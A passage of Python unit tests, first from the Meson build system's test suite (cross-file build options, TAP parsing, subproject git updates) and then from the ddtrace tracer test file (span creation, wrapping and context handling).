testcase = os.path.join(self.common_test_dir, '2 cpp')
config = self.helper_create_cross_file({'built-in options': {'cpp_std': 'c++14'}})
self.init(testcase, extra_args=['--cross-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'cpp_std':
self.assertEqual(each['value'], 'c++14')
break
else:
self.fail('No c++ standard set?')
def test_builtin_options_per_machine(self):
"""Test options that are allowed to be set on a per-machine basis.
Such options could be passed twice, once for the build machine, and
once for the host machine. I've picked pkg-config path, but any would
do that can be set for both.
"""
testcase = os.path.join(self.common_test_dir, '2 cpp')
cross = self.helper_create_cross_file({'built-in options': {'pkg_config_path': '/cross/path', 'cpp_std': 'c++17'}})
native = self.helper_create_cross_file({'built-in options': {'pkg_config_path': '/native/path', 'cpp_std': 'c++14'}})
# Ensure that PKG_CONFIG_PATH is not set in the environment
with mock.patch.dict('os.environ'):
for k in ['PKG_CONFIG_PATH', 'PKG_CONFIG_PATH_FOR_BUILD']:
try:
del os.environ[k]
except KeyError:
pass
self.init(testcase, extra_args=['--cross-file', cross, '--native-file', native])
configuration = self.introspect('--buildoptions')
found = 0
for each in configuration:
if each['name'] == 'pkg_config_path':
self.assertEqual(each['value'], ['/cross/path'])
found += 1
elif each['name'] == 'cpp_std':
self.assertEqual(each['value'], 'c++17')
found += 1
elif each['name'] == 'build.pkg_config_path':
self.assertEqual(each['value'], ['/native/path'])
found += 1
elif each['name'] == 'build.cpp_std':
self.assertEqual(each['value'], 'c++14')
found += 1
if found == 4:
break
self.assertEqual(found, 4, 'Did not find all sections.')
def test_builtin_options_conf_overrides_env(self):
testcase = os.path.join(self.common_test_dir, '2 cpp')
config = self.helper_create_cross_file({'built-in options': {'pkg_config_path': '/native'}})
cross = self.helper_create_cross_file({'built-in options': {'pkg_config_path': '/cross'}})
self.init(testcase, extra_args=['--native-file', config, '--cross-file', cross],
override_envvars={'PKG_CONFIG_PATH': '/bar', 'PKG_CONFIG_PATH_FOR_BUILD': '/dir'})
configuration = self.introspect('--buildoptions')
found = 0
for each in configuration:
if each['name'] == 'pkg_config_path':
self.assertEqual(each['value'], ['/cross'])
found += 1
elif each['name'] == 'build.pkg_config_path':
self.assertEqual(each['value'], ['/native'])
found += 1
if found == 2:
break
self.assertEqual(found, 2, 'Did not find all sections.')
class TAPParserTests(unittest.TestCase):
def assert_test(self, events, **kwargs):
if 'explanation' not in kwargs:
kwargs['explanation'] = None
self.assertEqual(next(events), TAPParser.Test(**kwargs))
def assert_plan(self, events, **kwargs):
if 'skipped' not in kwargs:
kwargs['skipped'] = False
if 'explanation' not in kwargs:
kwargs['explanation'] = None
self.assertEqual(next(events), TAPParser.Plan(**kwargs))
def assert_version(self, events, **kwargs):
self.assertEqual(next(events), TAPParser.Version(**kwargs))
def assert_error(self, events):
self.assertEqual(type(next(events)), TAPParser.Error)
def assert_bailout(self, events, **kwargs):
self.assertEqual(next(events), TAPParser.Bailout(**kwargs))
def assert_last(self, events):
with self.assertRaises(StopIteration):
next(events)
def parse_tap(self, s):
parser = TAPParser(io.StringIO(s))
return iter(parser.parse())
def parse_tap_v13(self, s):
events = self.parse_tap('TAP version 13\n' + s)
self.assert_version(events, version=13)
return events
def test_empty(self):
events = self.parse_tap('')
self.assert_last(events)
def test_empty_plan(self):
events = self.parse_tap('1..0')
self.assert_plan(events, count=0, late=False, skipped=True)
self.assert_last(events)
def test_plan_directive(self):
events = self.parse_tap('1..0 # skipped for some reason')
self.assert_plan(events, count=0, late=False, skipped=True,
explanation='for some reason')
self.assert_last(events)
events = self.parse_tap('1..1 # skipped for some reason\nok 1')
self.assert_error(events)
self.assert_plan(events, count=1, late=False, skipped=True,
explanation='for some reason')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap('1..1 # todo not supported here\nok 1')
self.assert_error(events)
self.assert_plan(events, count=1, late=False, skipped=False,
explanation='not supported here')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_ok(self):
events = self.parse_tap('ok')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_with_number(self):
events = self.parse_tap('ok 1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_with_name(self):
events = self.parse_tap('ok 1 abc')
self.assert_test(events, number=1, name='abc', result=TestResult.OK)
self.assert_last(events)
def test_one_test_not_ok(self):
events = self.parse_tap('not ok')
self.assert_test(events, number=1, name='', result=TestResult.FAIL)
self.assert_last(events)
def test_one_test_todo(self):
events = self.parse_tap('not ok 1 abc # TODO')
self.assert_test(events, number=1, name='abc', result=TestResult.EXPECTEDFAIL)
self.assert_last(events)
events = self.parse_tap('ok 1 abc # TODO')
self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS)
self.assert_last(events)
def test_one_test_skip(self):
events = self.parse_tap('ok 1 abc # SKIP')
self.assert_test(events, number=1, name='abc', result=TestResult.SKIP)
self.assert_last(events)
def test_one_test_skip_failure(self):
events = self.parse_tap('not ok 1 abc # SKIP')
self.assert_test(events, number=1, name='abc', result=TestResult.FAIL)
self.assert_last(events)
def test_many_early_plan(self):
events = self.parse_tap('1..4\nok 1\nnot ok 2\nok 3\nnot ok 4')
self.assert_plan(events, count=4, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_test(events, number=3, name='', result=TestResult.OK)
self.assert_test(events, number=4, name='', result=TestResult.FAIL)
self.assert_last(events)
def test_many_late_plan(self):
events = self.parse_tap('ok 1\nnot ok 2\nok 3\nnot ok 4\n1..4')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_test(events, number=3, name='', result=TestResult.OK)
self.assert_test(events, number=4, name='', result=TestResult.FAIL)
self.assert_plan(events, count=4, late=True)
self.assert_last(events)
def test_directive_case(self):
events = self.parse_tap('ok 1 abc # skip')
self.assert_test(events, number=1, name='abc', result=TestResult.SKIP)
self.assert_last(events)
events = self.parse_tap('ok 1 abc # ToDo')
self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS)
self.assert_last(events)
def test_directive_explanation(self):
events = self.parse_tap('ok 1 abc # skip why')
self.assert_test(events, number=1, name='abc', result=TestResult.SKIP,
explanation='why')
self.assert_last(events)
events = self.parse_tap('ok 1 abc # ToDo Because')
self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS,
explanation='Because')
self.assert_last(events)
def test_one_test_early_plan(self):
events = self.parse_tap('1..1\nok')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_late_plan(self):
events = self.parse_tap('ok\n1..1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_plan(events, count=1, late=True)
self.assert_last(events)
def test_out_of_order(self):
events = self.parse_tap('ok 2')
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
def test_middle_plan(self):
events = self.parse_tap('ok 1\n1..2\nok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_plan(events, count=2, late=True)
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
def test_too_many_plans(self):
events = self.parse_tap('1..1\n1..2\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_error(events)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_too_many(self):
events = self.parse_tap('ok 1\nnot ok 2\n1..1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_plan(events, count=1, late=True)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..1\nok 1\nnot ok 2')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_error(events)
self.assert_last(events)
def test_too_few(self):
events = self.parse_tap('ok 1\nnot ok 2\n1..3')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_plan(events, count=3, late=True)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..3\nok 1\nnot ok 2')
self.assert_plan(events, count=3, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_error(events)
self.assert_last(events)
def test_too_few_bailout(self):
events = self.parse_tap('1..3\nok 1\nnot ok 2\nBail out! no third test')
self.assert_plan(events, count=3, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_bailout(events, message='no third test')
self.assert_last(events)
def test_diagnostics(self):
events = self.parse_tap('1..1\n# ignored\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap('# ignored\n1..1\nok 1\n# ignored too')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap('# ignored\nok 1\n1..1\n# ignored too')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_plan(events, count=1, late=True)
self.assert_last(events)
def test_empty_line(self):
events = self.parse_tap('1..1\n\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_unexpected(self):
events = self.parse_tap('1..1\ninvalid\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_error(events)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_version(self):
events = self.parse_tap('TAP version 13\n')
self.assert_version(events, version=13)
self.assert_last(events)
events = self.parse_tap('TAP version 12\n')
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..0\nTAP version 13\n')
self.assert_plan(events, count=0, late=False, skipped=True)
self.assert_error(events)
self.assert_last(events)
def test_yaml(self):
events = self.parse_tap_v13('ok\n ---\n foo: abc\n bar: def\n ...\nok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap_v13('ok\n ---\n foo: abc\n bar: def')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap_v13('ok 1\n ---\n foo: abc\n bar: def\nnot ok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_last(events)
class SubprojectsCommandTests(BasePlatformTests):
def setUp(self):
super().setUp()
self.root_dir = Path(self.builddir)
self.project_dir = self.root_dir / 'src'
self._create_project(self.project_dir)
self.subprojects_dir = self.project_dir / 'subprojects'
os.makedirs(str(self.subprojects_dir))
def _create_project(self, path, project_name='dummy'):
os.makedirs(str(path), exist_ok=True)
with open(str(path / 'meson.build'), 'w') as f:
f.write("project('{}')".format(project_name))
def _git(self, cmd, workdir):
return git(cmd, str(workdir), check=True)[1].strip()
def _git_config(self, workdir):
self._git(['config', 'user.name', 'Meson Test'], workdir)
self._git(['config', 'user.email', '[email protected]'], workdir)
def _git_remote(self, cmd, name):
return self._git(cmd, self.root_dir / name)
def _git_local(self, cmd, name):
return self._git(cmd, self.subprojects_dir / name)
def _git_local_branch(self, name):
# Same as `git branch --show-current` but compatible with older git version
branch = self._git_local(['rev-parse', '--abbrev-ref', 'HEAD'], name)
return branch if branch != 'HEAD' else ''
def _git_local_commit(self, name, ref='HEAD'):
return self._git_local(['rev-parse', ref], name)
def _git_remote_commit(self, name, ref='HEAD'):
return self._git_remote(['rev-parse', ref], name)
def _git_create_repo(self, path):
self._create_project(path)
self._git(['init'], path)
self._git_config(path)
self._git(['add', '.'], path)
self._git(['commit', '-m', 'Initial commit'], path)
def _git_create_remote_repo(self, name):
self._git_create_repo(self.root_dir / name)
def _git_create_local_repo(self, name):
self._git_create_repo(self.subprojects_dir / name)
def _git_create_remote_commit(self, name, branch):
self._git_remote(['checkout', branch], name)
self._git_remote(['commit', '--allow-empty', '-m', 'initial {} commit'.format(branch)], name)
def _git_create_remote_branch(self, name, branch):
self._git_remote(['checkout', '-b', branch], name)
self._git_remote(['commit', '--allow-empty', '-m', 'initial {} commit'.format(branch)], name)
def _git_create_remote_tag(self, name, tag):
self._git_remote(['commit', '--allow-empty', '-m', 'tag {} commit'.format(tag)], name)
self._git_remote(['tag', tag], name)
def _wrap_create_git(self, name, revision='master'):
path = self.root_dir / name
with open(str((self.subprojects_dir / name).with_suffix('.wrap')), 'w') as f:
f.write(textwrap.dedent(
'''
[wrap-git]
url={}
revision={}
'''.format(os.path.abspath(str(path)), revision)))
def _wrap_create_file(self, name, tarball='dummy.tar.gz'):
path = self.root_dir / tarball
with open(str((self.subprojects_dir / name).with_suffix('.wrap')), 'w') as f:
f.write(textwrap.dedent(
'''
[wrap-file]
source_url={}
'''.format(os.path.abspath(str(path)))))
def _subprojects_cmd(self, args):
return self._run(self.meson_command + ['subprojects'] + args, workdir=str(self.project_dir))
def test_git_update(self):
subp_name = 'sub1'
# Create a fake remote git repository and a wrap file. Checks that
# "meson subprojects download" works.
self._git_create_remote_repo(subp_name)
self._wrap_create_git(subp_name)
self._subprojects_cmd(['download'])
self.assertPathExists(str(self.subprojects_dir / subp_name))
self._git_config(self.subprojects_dir / subp_name)
# Create a new remote branch and update the wrap file. Checks that
# "meson subprojects update --reset" checkout the new branch.
self._git_create_remote_branch(subp_name, 'newbranch')
self._wrap_create_git(subp_name, 'newbranch')
self._subprojects_cmd(['update', '--reset'])
self.assertEqual(self._git_local_branch(subp_name), 'newbranch')
self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name, 'newbranch'))
# Update remote newbranch. Checks the new commit is pulled into existing
# local newbranch. Make sure it does not print spurious 'git stash' message.
self._git_create_remote_commit(subp_name, 'newbranch')
out = self._subprojects_cmd(['update', '--reset'])
self.assertNotIn('No local changes to save', out)
self.assertEqual(self._git_local_branch(subp_name), 'newbranch')
self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name, 'newbranch'))
# Update remote newbranch and switch to another branch. Checks that it
# switch current branch to newbranch and pull latest commit.
self._git_local(['checkout', 'master'], subp_name)
self._git_create_remote_commit(subp_name, 'newbranch')
self._subprojects_cmd(['update', '--reset'])
self.assertEqual(self._git_local_branch(subp_name), 'newbranch')
self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name, 'newbranch'))
# Stage some local changes then update. Checks that local changes got
# stashed.
self._create_project(self.subprojects_dir / subp_name, 'new_project_name')
self._git_local(['add', '.'], subp_name)
self._git_create_remote_commit(subp_name, 'newbranch')
self._subprojects_cmd(['update', '--reset'])
self.assertEqual(self._git_local_branch(subp_name), 'newbranch')
self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name, 'newbranch'))
self.assertTrue(self._git_local(['stash', 'list'], subp_name))
# Create a new remote tag and update the wrap file. Checks that
# "meson subprojects update --reset" checkout the new tag in detached mode.
self._git_create_remote_tag(subp_name, 'newtag')
self._wrap_create_git(subp_name, 'newtag')
self._subprojects_cmd(['update', '--reset'])
self.assertEqual(self._git_local_branch(subp_name), '')
self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name, 'newtag'))
# Create a new remote commit and update the wrap file with the commit id.
# Checks that "meson subprojects update --reset" checkout the new commit
# in detached mode.
self._git_local(['checkout', 'master'], subp_name)
self._git_create_remote_commit(subp_name, 'newbranch')
new_commit = self._git_remote(['rev-parse', 'HEAD'], subp_name)
self._wrap_create_git(subp_name, new_commit)
self._subprojects_cmd(['update', '--reset'])
self.assertEqual(self._git_local_branch(subp_name), '')
self.assertEqual(self._git_local_commit(subp_name), new_commit)
# Create a local project not in a git repository, then update it with
# a git wrap. Without --reset it should print error message and return
# failure. With --reset it should delete existing project and clone the
# new project.
subp_name = 'sub2'
self._create_project(self.subprojects_dir / subp_name)
self._git_create_remote_repo(subp_name)
self._wrap_create_git(subp_name)
with self.assertRaises(subprocess.CalledProcessError) as cm:
self._subprojects_cmd(['update'])
self.assertIn('Not a git repository', cm.exception.output)
self._subprojects_cmd(['update', '--reset'])
self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name))
@skipIfNoExecutable('true')
def test_foreach(self):
self._create_project(self.subprojects_dir / 'sub_file')
self._wrap_create_file('sub_file')
self._git_create_local_repo('sub_git')
self._wrap_create_git('sub_git')
self._git_create_local_repo('sub_git_no_wrap')
def ran_in(s):
ret = []
prefix = 'Executing command in '
for l in s.splitlines():
if l.startswith(prefix):
ret.append(l[len(prefix):])
return sorted(ret)
dummy_cmd = ['true']
out = self._subprojects_cmd(['foreach'] + dummy_cmd)
self.assertEqual(ran_in(out), sorted(['subprojects/sub_file', 'subprojects/sub_git', 'subprojects/sub_git_no_wrap']))
out = self._subprojects_cmd(['foreach', '--types', 'git,file'] + dummy_cmd)
self.assertEqual(ran_in(out), sorted(['subprojects/sub_file', 'subprojects/sub_git']))
out = self._subprojects_cmd(['foreach', '--types', 'file'] + dummy_cmd)
self.assertEqual(ran_in(out), ['subprojects/sub_file'])
out = self._subprojects_cmd(['foreach', '--types', 'git'] + dummy_cmd)
self.assertEqual(ran_in(out), ['subprojects/sub_git'])
def _clang_at_least(compiler, minver: str, apple_minver: str) -> bool:
"""
check that Clang compiler is at least a specified version, whether AppleClang or regular Clang
Parameters
----------
compiler:
Meson compiler object
minver: str
Clang minimum version
apple_minver: str
AppleCLang minimum version
Returns
-------
at_least: bool
Clang is at least the specified version
"""
if isinstance(compiler, (mesonbuild.compilers.AppleClangCCompiler,
mesonbuild.compilers.AppleClangCPPCompiler)):
return version_compare(compiler.version, apple_minver)
return version_compare(compiler.version, minver)
def unset_envs():
# For unit tests we must fully control all command lines
# so that there are no unexpected changes coming from the
# environment, for example when doing a package build.
varnames = ['CPPFLAGS', 'LDFLAGS'] + list(mesonbuild.compilers.compilers.cflags_mapping.values())
for v in varnames:
if v in os.environ:
del os.environ[v]
def convert_args(argv):
# If we got passed a list of tests, pass it on
pytest_args = ['-v'] if '-v' in argv else []
test_list = []
for arg in argv:
if arg.startswith('-'):
if arg in ('-f', '--failfast'):
arg = '--exitfirst'
pytest_args.append(arg)
continue
# ClassName.test_name => 'ClassName and test_name'
if '.' in arg:
arg = ' and '.join(arg.split('.'))
test_list.append(arg)
if test_list:
pytest_args += ['-k', ' or '.join(test_list)]
return pytest_args
def running_single_tests(argv, cases):
'''
Check whether we only got arguments for running individual tests, not
entire testcases, and not all testcases (no test args).
'''
got_test_arg = False
for arg in argv:
if arg.startswith('-'):
continue
for case in cases:
if not arg.startswith(case):
continue
if '.' not in arg:
# Got a testcase, done
return False
got_test_arg = True
return got_test_arg
def main():
unset_envs()
cases = ['InternalTests', 'DataTests', 'AllPlatformTests', 'FailureTests',
'PythonTests', 'NativeFileTests', 'RewriterTests', 'CrossFileTests',
'TAPParserTests', 'SubprojectsCommandTests',
'LinuxlikeTests', 'LinuxCrossArmTests', 'LinuxCrossMingwTests',
'WindowsTests', 'DarwinTests']
try:
import pytest # noqa: F401
# Need pytest-xdist for `-n` arg
import xdist # noqa: F401
pytest_args = []
# Don't use pytest-xdist when running single unit tests since it wastes
# time spawning a lot of processes to distribute tests to in that case.
if not running_single_tests(sys.argv, cases):
pytest_args += ['-n', 'auto']
pytest_args += ['./run_unittests.py']
pytest_args += convert_args(sys.argv[1:])
return subprocess.run(python_command + ['-m', 'pytest'] + pytest_args).returncode
except ImportError:
print('pytest-xdist not found, using unittest instead')
# Fallback to plain unittest.
return unittest.main(defaultTest=cases, buffer=True)
if __name__ == '__main__':
print('Meson build system', mesonbuild.coredata.version, 'Unit Tests')
start = time.monotonic()
try:
raise SystemExit(main())
finally:
print('Total time: {:.3f} seconds'.format(time.monotonic() - start))
|
test_tracer.py
|
# -*- coding: utf-8 -*-
"""
tests for Tracer and utilities.
"""
import contextlib
import multiprocessing
import os
from os import getpid
import threading
from unittest.case import SkipTest
import mock
import pytest
import ddtrace
from ddtrace.constants import ENV_KEY
from ddtrace.constants import HOSTNAME_KEY
from ddtrace.constants import MANUAL_DROP_KEY
from ddtrace.constants import MANUAL_KEEP_KEY
from ddtrace.constants import ORIGIN_KEY
from ddtrace.constants import SAMPLING_PRIORITY_KEY
from ddtrace.constants import VERSION_KEY
from ddtrace.context import Context
from ddtrace.ext import priority
from ddtrace.ext import system
from ddtrace.internal.writer import AgentWriter
from ddtrace.internal.writer import LogWriter
from ddtrace.settings import Config
from ddtrace.tracer import Tracer
from ddtrace.vendor import six
from tests import DummyWriter
from tests import TracerTestCase
from tests import override_global_config
from tests.subprocesstest import run_in_subprocess
from .. import override_env
class TracerTestCases(TracerTestCase):
def test_tracer_vars(self):
span = self.trace("a", service="s", resource="r", span_type="t")
span.assert_matches(name="a", service="s", resource="r", span_type="t")
# DEV: Finish to ensure we don't leak `service` between spans
span.finish()
span = self.trace("a")
span.assert_matches(name="a", service=None, resource="a", span_type=None)
span.finish()
def test_tracer(self):
def _mix():
with self.trace("cake.mix"):
pass
def _bake():
with self.trace("cake.bake"):
pass
def _make_cake():
with self.trace("cake.make") as span:
span.service = "baker"
span.resource = "cake"
_mix()
_bake()
# let's run it and make sure all is well.
self.assert_has_no_spans()
_make_cake()
# Capture root's trace id to assert later
root_trace_id = self.get_root_span().trace_id
# Assert structure of this trace
self.assert_structure(
# Root span with 2 children
dict(name="cake.make", resource="cake", service="baker", parent_id=None),
(
# Span with no children
dict(name="cake.mix", resource="cake.mix", service="baker"),
# Span with no children
dict(name="cake.bake", resource="cake.bake", service="baker"),
),
)
# do it again and make sure it has new trace ids
self.reset()
_make_cake()
self.assert_span_count(3)
for s in self.spans:
assert s.trace_id != root_trace_id
def test_tracer_wrap(self):
@self.tracer.wrap("decorated_function", service="s", resource="r", span_type="t")
def f(tag_name, tag_value):
# make sure we can still set tags
span = self.tracer.current_span()
span.set_tag(tag_name, tag_value)
f("a", "b")
self.assert_span_count(1)
span = self.get_root_span()
span.assert_matches(
name="decorated_function",
service="s",
resource="r",
span_type="t",
meta=dict(a="b"),
)
def test_tracer_pid(self):
with self.trace("root") as root_span:
with self.trace("child") as child_span:
pass
# Root span should contain the pid of the current process
root_span.assert_metrics({system.PID: getpid()}, exact=False)
# Child span should not contain a pid tag
child_span.assert_metrics(dict(), exact=True)
def test_tracer_wrap_default_name(self):
@self.tracer.wrap()
def f():
pass
f()
self.assert_structure(dict(name="tests.tracer.test_tracer.f"))
def test_tracer_wrap_exception(self):
@self.tracer.wrap()
def f():
raise Exception("bim")
with self.assertRaises(Exception) as ex:
f()
self.assert_structure(
dict(
name="tests.test_tracer.f",
error=1,
meta={
"error.msg": ex.message,
"error.type": ex.__class__.__name__,
},
),
)
def test_tracer_wrap_multiple_calls(self):
@self.tracer.wrap()
def f():
pass
f()
f()
self.assert_span_count(2)
assert self.spans[0].span_id != self.spans[1].span_id
def test_tracer_wrap_span_nesting_current_root_span(self):
@self.tracer.wrap("inner")
def inner():
root_span = self.tracer.current_root_span()
self.assertEqual(root_span.name, "outer")
@self.tracer.wrap("outer")
def outer():
root_span = self.tracer.current_root_span()
self.assertEqual(root_span.name, "outer")
with self.trace("mid"):
root_span = self.tracer.current_root_span()
self.assertEqual(root_span.name, "outer")
inner()
outer()
def test_tracer_wrap_span_nesting(self):
@self.tracer.wrap("inner")
def inner():
pass
@self.tracer.wrap("outer")
def outer():
with self.trace("mid"):
inner()
outer()
self.assert_span_count(3)
self.assert_structure(
dict(name="outer"),
((dict(name="mid"), (dict(name="inner"),)),),
)
def test_tracer_wrap_class(self):
class Foo(object):
@staticmethod
@self.tracer.wrap()
def s():
return 1
@classmethod
@self.tracer.wrap()
def c(cls):
return 2
@self.tracer.wrap()
def i(cls):
return 3
f = Foo()
self.assertEqual(f.s(), 1)
self.assertEqual(f.c(), 2)
self.assertEqual(f.i(), 3)
self.assert_span_count(3)
self.spans[0].assert_matches(name="tests.tracer.test_tracer.s")
self.spans[1].assert_matches(name="tests.tracer.test_tracer.c")
self.spans[2].assert_matches(name="tests.tracer.test_tracer.i")
def test_tracer_wrap_factory(self):
def wrap_executor(tracer, fn, args, kwargs, span_name=None, service=None, resource=None, span_type=None):
with tracer.trace("wrap.overwrite") as span:
span.set_tag("args", args)
span.set_tag("kwargs", kwargs)
return fn(*args, **kwargs)
@self.tracer.wrap()
def wrapped_function(param, kw_param=None):
self.assertEqual(42, param)
self.assertEqual(42, kw_param)
# set the custom wrap factory after the wrapper has been called
self.tracer.configure(wrap_executor=wrap_executor)
# call the function expecting that the custom tracing wrapper is used
wrapped_function(42, kw_param=42)
self.assert_span_count(1)
self.spans[0].assert_matches(
name="wrap.overwrite",
meta=dict(args="(42,)", kwargs="{'kw_param': 42}"),
)
def test_tracer_wrap_factory_nested(self):
def wrap_executor(tracer, fn, args, kwargs, span_name=None, service=None, resource=None, span_type=None):
with tracer.trace("wrap.overwrite") as span:
span.set_tag("args", args)
span.set_tag("kwargs", kwargs)
return fn(*args, **kwargs)
@self.tracer.wrap()
def wrapped_function(param, kw_param=None):
self.assertEqual(42, param)
self.assertEqual(42, kw_param)
# set the custom wrap factory after the wrapper has been called
self.tracer.configure(wrap_executor=wrap_executor)
# call the function expecting that the custom tracing wrapper is used
with self.trace("wrap.parent", service="webserver"):
wrapped_function(42, kw_param=42)
self.assert_structure(
dict(name="wrap.parent", service="webserver"),
(dict(name="wrap.overwrite", service="webserver", meta=dict(args="(42,)", kwargs="{'kw_param': 42}")),),
)
def test_tracer_disabled(self):
self.tracer.enabled = True
with self.trace("foo") as s:
s.set_tag("a", "b")
self.assert_has_spans()
self.reset()
self.tracer.enabled = False
with self.trace("foo") as s:
s.set_tag("a", "b")
self.assert_has_no_spans()
def test_unserializable_span_with_finish(self):
try:
import numpy as np
except ImportError:
raise SkipTest("numpy not installed")
# a weird case where manually calling finish with an unserializable
# span was causing an loop of serialization.
with self.trace("parent") as span:
span.metrics["as"] = np.int64(1) # circumvent the data checks
span.finish()
def test_tracer_disabled_mem_leak(self):
# ensure that if the tracer is disabled, we still remove things from the
# span buffer upon finishing.
self.tracer.enabled = False
s1 = self.trace("foo")
s1.finish()
p1 = self.tracer.current_span()
s2 = self.trace("bar")
self.assertIsNone(s2._parent)
s2.finish()
self.assertIsNone(p1)
def test_tracer_global_tags(self):
s1 = self.trace("brie")
s1.finish()
self.assertIsNone(s1.get_tag("env"))
self.assertIsNone(s1.get_tag("other"))
self.tracer.set_tags({"env": "prod"})
s2 = self.trace("camembert")
s2.finish()
self.assertEqual(s2.get_tag("env"), "prod")
self.assertIsNone(s2.get_tag("other"))
self.tracer.set_tags({"env": "staging", "other": "tag"})
s3 = self.trace("gruyere")
s3.finish()
self.assertEqual(s3.get_tag("env"), "staging")
self.assertEqual(s3.get_tag("other"), "tag")
def test_global_context(self):
# the tracer uses a global thread-local Context
span = self.trace("fake_span")
ctx = self.tracer.get_call_context()
assert ctx.trace_id == span.trace_id
assert ctx.span_id == span.span_id
def test_tracer_current_span(self):
# the current span is in the local Context()
span = self.trace("fake_span")
assert self.tracer.current_span() == span
span.finish()
with self.trace("fake_span") as span:
assert self.tracer.current_span() == span
def test_tracer_current_span_missing_context(self):
self.assertIsNone(self.tracer.current_span())
def test_tracer_current_root_span_missing_context(self):
self.assertIsNone(self.tracer.current_root_span())
def test_default_provider_get(self):
# Tracer Context Provider must return a Context object
# even if empty
ctx = self.tracer.context_provider.active()
assert isinstance(ctx, Context)
def test_default_provider_set(self):
# The Context Provider can set the current active Context;
# this could happen in distributed tracing
ctx = Context(trace_id=42, span_id=100)
self.tracer.context_provider.activate(ctx)
span = self.trace("web.request")
span.assert_matches(name="web.request", trace_id=42, parent_id=100)
def test_start_span(self):
# it should create a root Span
span = self.tracer.start_span("web.request")
assert span.name == "web.request"
assert span.parent_id is None
span.finish()
spans = self.pop_spans()
assert len(spans) == 1
assert spans[0] is span
def test_start_span_optional(self):
# it should create a root Span with arguments
with self.start_span("web.request", service="web", resource="/", span_type="http") as span:
pass
span.assert_matches(
name="web.request",
service="web",
resource="/",
span_type="http",
)
def test_start_span_service_default(self):
span = self.start_span("")
span.assert_matches(service=None)
span.finish()
def test_start_span_service_from_parent(self):
with self.start_span("parent", service="mysvc") as parent:
with self.start_span("child", child_of=parent) as child:
pass
child.assert_matches(
name="child",
service="mysvc",
)
def test_start_span_service_global_config(self):
# When no service is provided a default
with self.override_global_config(dict(service="mysvc")):
with self.start_span("") as span:
span.assert_matches(service="mysvc")
def test_start_span_service_global_config_parent(self):
# Parent should have precedence over global config
with self.override_global_config(dict(service="mysvc")):
with self.start_span("parent", service="parentsvc") as parent:
with self.start_span("child", child_of=parent) as child:
pass
child.assert_matches(
name="child",
service="parentsvc",
)
def test_start_child_span(self):
# it should create a child Span for the given parent
with self.start_span("web.request") as parent:
assert self.tracer.current_span() is None
with self.start_span("web.worker", child_of=parent) as child:
assert self.tracer.current_span() is None
parent.assert_matches(
name="web.request",
parent_id=None,
_parent=None,
tracer=self.tracer,
)
child.assert_matches(
name="web.worker",
parent_id=parent.span_id,
_parent=parent,
tracer=self.tracer,
)
def test_start_child_span_attributes(self):
# it should create a child Span with parent's attributes
with self.start_span("web.request", service="web", resource="/", span_type="http") as parent:
with self.start_span("web.worker", child_of=parent) as child:
child.assert_matches(name="web.worker", service="web")
def test_start_child_from_context(self):
# it should create a child span with a populated Context
with self.start_span("web.request") as root:
with self.start_span("web.worker", child_of=root.context) as child:
pass
child.assert_matches(
